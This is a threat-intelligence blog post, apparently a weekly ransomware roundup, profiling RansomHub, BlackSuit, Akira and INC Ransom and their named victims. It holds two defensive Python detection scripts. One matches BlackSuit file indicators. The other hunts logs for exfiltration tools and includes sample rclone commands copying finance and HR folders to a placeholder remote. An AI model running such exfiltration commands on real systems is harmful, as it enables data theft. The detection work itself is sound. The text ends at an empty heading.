Ransomware on the Move: RansomHub, BlackSuit, Akira, INC Ransom

Date:

July 10, 2024


Halcyon publishes a quarterly RaaS and data extortion group reference guide, Power Rankings: Ransomware Malicious Quartile. Here are the ransomware gangs on the move last week:

During the week of June 24 to June 30, the cybersecurity landscape was significantly disrupted by a surge in ransomware attacks targeting various organizations across multiple sectors.  

This period saw high-profile ransomware incidents that disrupted operations and exposed sensitive data, highlighting ongoing vulnerabilities in digital defenses. The top four ransomware groups during this week were BlackSuit, Akira, RansomHub, and INC Ransom, demonstrating their relentless pursuit of ransom through sophisticated cyber-attacks.


The most targeted sector during this week was Manufacturing, with seven incidents reported, followed by Business Services with four cases and Construction with three, underscoring the susceptibility of these sectors to ransomware threats.

Other affected sectors included Finance, Agriculture, Software, Education, Government, Media & Internet, Healthcare Services, Transportation, Law Firms & Legal Services, Real Estate, and Energy, Utilities & Waste.


Attacks by these four groups combined represent 50% of the total attacks registered in our database for the week, underscoring the severe impact of these ransomware groups and the urgent need for enhanced cybersecurity measures.

RansomHub

RansomHub is a new ransomware group that has recently emerged in the cyber threat landscape, distinguishing themselves by making claims and backing them up with data leaks. The group is believed to have roots in Russia, with operations resembling a traditional Russian ransomware setup.  

RansomHub operates as a Ransomware-as-a-Service (RaaS) group, with affiliates receiving 90% of the ransom money and the remaining 10% going to the main group. Their ransomware strains are written in Golang, which is a relatively new trend in the ransomware world.  

This language choice may indicate a step towards future trends, as other recent ransomware strains, such as GhostSec and GhostLocker, have also been written in Golang. RansomHub targets various countries, including the US, Brazil, Indonesia, and Vietnam, without following a specific pattern, and healthcare institutions are among their notable victims.

Sicoob Bank, a prominent Brazilian financial cooperative, reported that RansomHub exfiltrated over 1 TB of sensitive data, including NDA documents, customer and employee personal data, financial information, and IT product source codes. Similarly, Spandex AG, a leading global supplier in the graphics and signage industry, experienced a breach that compromised confidential business data.  

These incidents highlight RansomHub's capability to significantly disrupt operations and compromise critical data integrity across various sectors. Sicoob Bank, with over 7.6 million members and substantial financial activities, and Spandex AG, with revenues exceeding €200 million, underscore the financial and operational impacts of these attacks.

Significant Attacks

  • Spandex AG, a Switzerland-based global supplier of materials and equipment for the sign-making, graphics, and vehicle wrapping markets, faced a significant breach by RansomHub. The attack led to the theft of confidential business data, raising concerns about the company's data security measures. Spandex AG, with a revenue of over €200 million and operations in 19 countries, exemplifies the high value targets that ransomware groups like RansomHub aim for in their attacks.
  • Midam Architectural Firm Co., LTD, a renowned South Korean architecture firm, experienced a ransomware attack by RansomHub, resulting in the exfiltration of 370GB of data. The attackers planned to auction the stolen information, threatening to publish it if unsold. This incident emphasizes the increasing threat of ransomware attacks on companies in various sectors, including architecture, which often handle significant amounts of sensitive data.

BlackSuit

BlackSuit is a ransomware family that emerged in 2023, closely related to the notorious Royal ransomware group. This malware targets both Windows and Linux systems, including VMware ESXi servers, appending the .blacksuit extension to encrypted files and dropping a ransom note named README.BlackSuit.txt.

Victims are directed to a Tor chat site for negotiations. Researchers have found that BlackSuit and Royal ransomware share over 98% similarity in their functions and code, suggesting that BlackSuit may be a new variant developed by the same authors, a copycat, or an affiliate of the Royal ransomware gang. BlackSuit's emergence highlights the continued evolution of ransomware threats, with significant potential for widespread impact.
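The two file-system indicators named above (the .blacksuit extension and the README.BlackSuit.txt note) are enough for a quick triage sweep of a file share. The following is an added example, not Halcyon's tooling: it walks a directory tree, tallies encrypted files, records where notes were dropped, and builds a constructed sample tree to demonstrate itself.

```python
import os
import tempfile
from pathlib import Path

# Indicators from the write-up: encrypted files carry this extension and the
# ransom note is dropped under this filename.
BLACKSUIT_EXTENSION = ".blacksuit"
BLACKSUIT_NOTE = "README.BlackSuit.txt"


def scan_for_blacksuit(root: str) -> dict:
    """Walk `root` and tally BlackSuit file-system indicators.

    Returns the count of files with the .blacksuit extension, the sorted
    list of directories containing a ransom note, and a verdict that is True
    if either indicator was seen at all.
    """
    encrypted = 0
    note_dirs = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name == BLACKSUIT_NOTE:
                note_dirs.append(dirpath)
            elif name.lower().endswith(BLACKSUIT_EXTENSION):
                encrypted += 1
    return {
        "encrypted_files": encrypted,
        "note_dirs": sorted(note_dirs),
        "suspected_blacksuit": encrypted > 0 or bool(note_dirs),
    }


def build_sample_tree(root: str, infected: bool) -> None:
    """Create a constructed sample tree (placeholder data, not victim files)."""
    share = Path(root) / "share"
    share.mkdir(parents=True, exist_ok=True)
    (Path(root) / "clean.txt").write_text("untouched\n")
    if infected:
        (share / "budget.xlsx.blacksuit").write_bytes(b"\x00" * 16)
        (share / "contract.docx.blacksuit").write_bytes(b"\x00" * 16)
        (share / BLACKSUIT_NOTE).write_text("constructed placeholder note\n")


def demo(infected: bool = True) -> dict:
    """Build a throwaway tree in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp, infected)
        return scan_for_blacksuit(tmp)


if __name__ == "__main__":
    print(demo())
```

Point `scan_for_blacksuit` at a mounted share to use it outside the demo; the verdict is a triage signal to confirm with the ransom-note contents and encryption timestamps, not a standalone attribution.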

BlackSuit's attacks typically involve the exfiltration of substantial amounts of sensitive data, posing severe risks to the affected organizations. For instance, Hiawatha Homes, Inc., a non-profit organization providing support services for individuals with disabilities, experienced a breach involving 106,336 files totaling over 40 billion bytes.  

The compromised data included sensitive information from various departments such as finance, human resources, and public relations. These breaches demonstrate BlackSuit's capability to significantly disrupt operations and compromise critical data integrity.  

Significant Attacks

  • Youngs Timber & Builders Merchants, a leading supplier of building materials and timber products, was hit by a ransomware attack from the BlackSuit group on June 26, 2024. This incident has sparked major concerns regarding the security of the company's data and operations. The extent of the data breach is still unclear, but the company's estimated revenue is $5.6 million.
  • KADOKAWA Corporation, a prominent Japanese media conglomerate with significant influence in publishing, anime, and video games, was targeted by BlackSuit on June 8, 2024. The attack compromised personal details of students, graduates, and employees associated with DWANGO Co., Ltd. Despite assurances that customer credit card information was not leaked, the incident underscores the challenges faced by major media companies.

Akira

Akira is a new and rapidly growing ransomware family that first emerged in March 2023. The group has quickly distinguished itself by targeting small to medium-sized businesses across various sectors including government, manufacturing, technology, education, consulting, pharmaceuticals, and telecommunications in Europe, North America, and Australia.

Believed to be affiliated with the now-defunct Conti ransomware gang, Akira shares similarities in code with Conti. The group employs double extortion tactics, stealing data before encrypting systems and demanding a ransom for both decryption and data deletion, with demands ranging from $200,000 to over $4 million.  

Akira's operations are marked by their unique dark web leak site, featuring a retro 1980s-style green-on-black interface, and their use of tools like RClone, FileZilla, and WinSCP for data exfiltration. As of January 2024, Akira has claimed over 250 victims and $42 million in ransomware proceeds, making them a significant and evolving threat in the cyber landscape.
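Because the exfiltration tools named above (RClone, FileZilla, WinSCP) are also legitimate administration utilities, a practical hunt flags their execution and raises severity for off-hours runs rather than blocking outright. The following is an added example, not Halcyon's or Akira's code; the process-creation log format and the events themselves are constructed for the demonstration.

```python
import re

# Exfiltration tools attributed to Akira intrusions in the write-up.
EXFIL_TOOLS = {"rclone.exe", "filezilla.exe", "winscp.exe"}

# Constructed process-creation events (not a real log):
# timestamp host user image-path [command line]
SAMPLE_EVENTS = """\
2024-06-26T02:14:05Z FS01 CORP\\svc_backup C:\\Tools\\rclone.exe copy D:\\Finance remote:bucket --transfers 16
2024-06-26T02:16:40Z FS01 CORP\\svc_backup C:\\Tools\\rclone.exe copy D:\\HR remote:bucket --transfers 16
2024-06-26T09:02:11Z WS17 CORP\\jdoe C:\\Program Files\\WinSCP\\WinSCP.exe /console
2024-06-26T09:05:30Z WS17 CORP\\jdoe C:\\Windows\\System32\\notepad.exe
2024-06-26T03:01:00Z DC02 CORP\\admin C:\\Users\\Public\\fz\\filezilla.exe -c 0/upload
"""

# Image paths may contain spaces, so match non-greedily up to the first ".exe".
EVENT_RE = re.compile(r"^(\S+) (\S+) (\S+) (.+?\.exe)(?:\s+(.*))?$", re.IGNORECASE)


def parse_event(line: str):
    """Split one log line into its fields; return None for unparseable lines."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ts, host, user, image, cmdline = m.groups()
    return {"ts": ts, "host": host, "user": user, "image": image,
            "cmdline": cmdline or ""}


def hunt_exfil_tools(log_text: str) -> list:
    """Return one finding per execution of a known exfiltration tool.

    Runs between 00:00 and 05:59 (hour taken from the UTC timestamp) are
    rated high; everything else is medium and needs analyst review.
    """
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        if exe not in EXFIL_TOOLS:
            continue
        off_hours = int(ev["ts"][11:13]) < 6
        findings.append({"host": ev["host"], "user": ev["user"], "tool": exe,
                         "off_hours": off_hours,
                         "severity": "high" if off_hours else "medium"})
    return findings


if __name__ == "__main__":
    for f in hunt_exfil_tools(SAMPLE_EVENTS):
        print(f)
```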

Akira's attacks typically involve the exfiltration of substantial amounts of sensitive data, posing severe risks to the affected organizations. Power Lube Industrial, a manufacturer of industrial lubrication equipment, suffered a breach with attackers threatening to release financial data, bank details, customer information, and NDAs. The total data exfiltrated remains unspecified, but the breach has significant implications given Power Lube Industrial’s annual revenue of $10 million.  

Similarly, Waterbury Newton, a well-established law firm in Kentville, Nova Scotia, was also targeted, with the attack compromising sensitive legal documents and client information. The full extent of the data breach remains unknown, but the potential implications for client confidentiality and legal operations are profound.  

Significant Attacks

  • PCI Developments, a leading real estate developer in Vancouver, fell victim to a ransomware attack by Akira, resulting in the exfiltration of 570GB of sensitive data. This breach involved client agreements, financial files, and confidential reports, reflecting the extensive impact on the company's operations and client trust.
  • Wilmots, a respected law firm specializing in conveyancing, probate, trusts, and classic car litigation, has been attacked by the Akira ransomware group. The attackers have threatened to release sensitive personal documents, including passports, birth certificates, and driver's licenses of clients, as well as numerous court documents and hearing records. This breach significantly jeopardizes the privacy and security of Wilmots' clients. The firm, based in Cirencester, Gloucestershire, UK, is known for its bespoke legal advice and traditional service values, employing nine SRA-regulated solicitors.

INC Ransom

INC Ransom is a highly sophisticated ransomware group that has gained significant notoriety in the cyber threat landscape. Emerging in 2023, the group is distinguished by its targeted ransomware attacks on corporate and organizational networks, employing advanced techniques such as spear-phishing campaigns and exploiting vulnerabilities like CVE-2023-3519 in Citrix NetScaler.  

INC Ransom operates using both Commercial Off-The-Shelf (COTS) software and legitimate system tools for reconnaissance and lateral movement within networks. Their attacks involve not only encrypting data but also stealing it, with threats to release the stolen information publicly if ransom demands are not met—a tactic known as double extortion. INC Ransom has targeted various industries, including healthcare, education, government entities, and technology companies, with notable breaches including Xerox Corp and NHS Scotland.

For instance, the City of Coon Rapids, Minnesota, experienced a ransomware attack in which INC Ransom claimed to have accessed and exfiltrated extensive municipal data. With the city's estimated revenue at $40.9 million, the potential scale of the breach is significant. Similarly, Planar Systems Inc., a leading U.S. provider of digital display solutions based in Beaverton, Oregon, has also been targeted by the group. The company's extensive product portfolio includes high-resolution LED video walls, LCD video walls, large format LCD displays, interactive touch screens, and transparent OLED displays, serving industries such as retail, corporate, education, and healthcare.

Significant Attacks